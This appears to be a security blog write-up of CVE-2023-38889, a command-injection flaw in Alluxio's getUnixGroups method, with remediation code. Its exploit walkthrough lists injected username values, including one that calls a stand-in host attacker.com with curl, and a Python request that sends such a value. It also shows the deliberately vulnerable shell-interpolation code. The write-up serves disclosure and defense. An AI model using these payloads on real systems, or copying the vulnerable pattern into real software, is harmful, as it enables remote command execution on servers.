On August 10, 2023, a critical vulnerability was disclosed in Alluxio—a popular open-source data orchestration platform. Tracked as CVE-2023-38889, this flaw allows attackers to execute arbitrary commands on servers running Alluxio version 2.9.3 and earlier. The root cause lies in how user input is passed directly to the Linux shell through the getUnixGroups method, opening the door to command injection.
If you're running Alluxio or you're responsible for securing distributed file systems, this vulnerability deserves your urgent attention. This write-up explains the vulnerability in simple terms, walks through an example exploit, and provides guidance on remediation.
How Does CVE-2023-38889 Work?
The problematic method in Alluxio is alluxio.util.CommonUtils.getUnixGroups(String username). This function is supposed to look up the Unix groups a user belongs to, but it does so by invoking a shell command and directly interpolating the username parameter into it—without sanitization.
This allows an attacker to inject shell metacharacters, so the system ends up executing arbitrary commands on the server.
Code Snippet: The Vulnerable Method
Here's a simplified version of the vulnerable code found in Alluxio's GitHub repository (the real method builds the command string and hands it to `bash -c`, which is what makes shell metacharacters in the username dangerous):

```java
import java.io.*;
import java.util.*;

public static List<String> getUnixGroups(String username) throws IOException {
  // Vulnerable spot: user input (username) is concatenated into a command string that bash will parse
  String cmd = "id -Gn " + username;
  Process process = Runtime.getRuntime().exec(new String[] {"bash", "-c", cmd});
  // Reads the single output line of id(1) (e.g. "bob users docker") into a list
  try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()))) {
    String line = reader.readLine();
    return line == null ? List.of() : Arrays.asList(line.trim().split("\\s+"));
  }
}
```
What’s dangerous?
Let's say an attacker supplies `username = "bob; touch /tmp/hacked #"`.
The command the shell runs becomes:

```sh
id -Gn bob; touch /tmp/hacked #
```

The result? Besides running the original `id` command, the shell also creates the file `/tmp/hacked`, demonstrating arbitrary command execution.
How to Exploit CVE-2023-38889
Let's walk through an example exploit under the assumption that you have access to a vulnerable Alluxio deployment (or can trick a component into passing your input to getUnixGroups):

1. Find a place where you can influence the username parameter (e.g., when Alluxio authenticates users or lists their group memberships).
2. Supply a malicious username, for example:

```sh
eviluser; curl http://attacker.com/whoami #
```

or

```sh
anyuser; touch /tmp/owned #
```

3. Check the server for the file (/tmp/owned), or your attacker's web server for incoming requests.
Below is a Python pseudo-code example of sending a malicious username via a hypothetical HTTP API endpoint:

```python
import requests

malicious_username = "john; touch /tmp/pwned #"
data = {'username': malicious_username}
# Suppose Alluxio exposes an HTTP API at /api/get-groups (hypothetical endpoint)
resp = requests.post('http://alluxio-server:19999/api/get-groups', json=data)
print(f"Status: {resp.status_code}")
```
> Note: The actual attack surface depends on how Alluxio is set up and what APIs or interfaces are exposed that eventually lead to getUnixGroups.
Official Advisory & References
- Alluxio Security Advisory: GitHub Issue #18061
- NVD Entry: CVE-2023-38889
- Patch Commit: PR #18080
- Alluxio download and docs: https://alluxio.io/
Remediation
Upgrade to Alluxio 2.9.4 or later, where this bug is patched. The fix involves passing user input as an argument to ProcessBuilder or sanitizing it, rather than interpolating it into a shell command as a string.
Instead of:

```java
String cmd = "id -Gn " + username;
Process process = Runtime.getRuntime().exec(cmd);
```

Use:

```java
ProcessBuilder pb = new ProcessBuilder("id", "-Gn", username);
Process process = pb.start();
```

This way, shell metacharacters in the username are not interpreted by the shell, because no shell is involved: the username reaches `id` as a single argv element.
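To show the whole hardened pattern end to end, here is an added example (not Alluxio's code, and not the patch from PR #18080) that combines the two points above: an allowlist check on the username and an argv-based `ProcessBuilder` call with no shell. The class name `SafeUnixGroups`, the allowlist pattern (lower-case POSIX-style names up to 32 characters) and the 5-second timeout are assumptions chosen for illustration; adjust the pattern to whatever user names your deployment actually needs to resolve.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;

public final class SafeUnixGroups {
  // Assumed allowlist for POSIX-style user names: must start with a letter or underscore,
  // so a value like "--help" cannot be parsed as an option by id(1), and every shell
  // metacharacter (; | & $ ` ( ) space ...) is rejected by construction.
  private static final Pattern SAFE_USERNAME = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");

  public static boolean isSafeUsername(String username) {
    return username != null && SAFE_USERNAME.matcher(username).matches();
  }

  /** Hardened lookup: validate first, then pass the name as one argv element (no shell). */
  public static List<String> getUnixGroups(String username)
      throws IOException, InterruptedException {
    if (!isSafeUsername(username)) {
      // Fail closed. A rejected value is worth logging: it is a strong signal of an injection attempt.
      throw new IllegalArgumentException("rejected unsafe username");
    }
    ProcessBuilder pb = new ProcessBuilder("id", "-Gn", username);
    pb.redirectErrorStream(true);
    Process process = pb.start();

    List<String> groups = new ArrayList<>();
    try (BufferedReader reader = new BufferedReader(
        new InputStreamReader(process.getInputStream()))) {
      String line = reader.readLine(); // id -Gn prints one line, e.g. "bob users docker"
      if (line != null && !line.isBlank()) {
        for (String g : line.trim().split("\\s+")) {
          groups.add(g);
        }
      }
    }
    // Bound the wait so a hung child cannot tie up the caller indefinitely (assumed 5 s).
    if (!process.waitFor(5, TimeUnit.SECONDS)) {
      process.destroyForcibly();
      throw new IOException("id timed out for user " + username);
    }
    if (process.exitValue() != 0) {
      throw new IOException("id failed for user " + username + ": " + String.join(" ", groups));
    }
    return groups;
  }

  public static void main(String[] args) throws Exception {
    // Constructed sample inputs: one benign name and three that the allowlist must reject.
    String[] samples = {"bob", "bob; touch /tmp/hacked #", "$(id)", "--help"};
    for (String s : samples) {
      System.out.println("\"" + s + "\" -> " + (isSafeUsername(s) ? "accepted" : "rejected"));
    }
    // Resolve the current user's groups through the hardened path.
    System.out.println(getUnixGroups(System.getProperty("user.name")));
  }
}
```

Two design points are worth noting. Passing argv directly is what stops the shell injection, but it does not by itself stop an argument such as `--help` from being parsed as an option by `id`, which is why the allowlist requires a leading letter or underscore. And rejected names are a cheap detection signal: a user name containing `;`, `|` or `$(` has no legitimate reason to reach this method, so logging those rejections gives operations a concrete event to alert on.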
Conclusion
CVE-2023-38889 is a classic but severe case of command injection in a high-profile data platform. Unpatched, it lets attackers run any command they want on the Alluxio host—a full compromise. If you run Alluxio, patch NOW!
More Reading
- OWASP: Command Injection
- Alluxio security docs
*This article is written in accessible American English and is exclusive content aimed at helping the community understand, identify, and defend against CVE-2023-38889 in Alluxio.*
Timeline
Published on: 08/15/2023 17:15:00 UTC
Last modified on: 08/25/2023 12:58:00 UTC